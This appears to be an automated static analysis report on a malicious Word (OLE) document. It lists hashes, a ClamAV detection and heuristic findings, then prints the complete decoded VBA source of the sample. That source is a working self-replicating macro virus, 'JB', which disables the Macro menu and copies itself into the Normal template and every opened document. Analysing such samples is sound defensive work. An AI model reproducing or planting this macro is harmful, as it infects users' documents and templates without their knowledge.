Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0729a6816067a1ab…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 37.0 KB
Created: 2000-01-15 17:04:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 77c08a1327559fee90d9bc101a9795e8
SHA-1: 0574402e6b64b07f15b0d779062125bc6a4d589f
SHA-256: 0729a6816067a1abbfd860f3d5093100ee83b8561847fa58b0d7049896045c3f
Risk Score: 120

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic)

The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro attempts to infect both the Normal template and the active document by copying its code. This behavior suggests an attempt to establish persistence or prepare for a secondary payload, although the full script was truncated. The ClamAV detection 'Doc.Trojan.Jb-1' further supports its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Trojan.Jb-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Jb-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  2296 bytes
SHA-256: 513a9cb5d9fcf1f9a505eb513126f928a0e1bb0a83def1c59998103c7138aef0

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "JB"
Attribute VB_Base = "1Normal.JB"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Dim prvInfNorm As Boolean
Dim prvInfAct As Boolean
Dim prvCodeCount As Integer
Private Sub Document_Close()
    ActiveDocument.SaveAs ActiveDocument.FullName
    CommandBars("Macro").Enabled = True
End Sub

Private Sub Document_New()
    Document_Open
End Sub

Private Sub Document_Open()


    CommandBars("Macro").Enabled = False
    
    
    'Check The Name of the Normal Template and Active Document Projects
    If NormalTemplate.VBProject.VBComponents.Item(1).Name <> "JB" Then
        NormalTemplate.VBProject.VBComponents.Item(1).Name = "JB"
        prvInfNorm = True 'Infect Normal
    Else
        prvInfNorm = False ' Don't Infect Normal
    End If
    If ActiveDocument.VBProject.VBComponents.Item(1).Name <> "JB" Then
        ActiveDocument.VBProject.VBComponents.Item(1).Name = "JB"
        prvInfAct = True 'Infect Active Document
    Else
        prvInfAct = False 'Don't Infect Active Document
    End If

    'Infecting the Normal Template
    If prvInfNorm = True Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        For prvCodeCount = 1 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
            NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines prvCodeCount, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(prvCodeCount, 1)
        Next prvCodeCount
    End If

    ' Infecting the Active Document
    If prvInfAct = True Then
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        For prvCodeCount = 1 To NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
            ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines prvCodeCount, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(prvCodeCount, 1)
        Next prvCodeCount
    End If

End Sub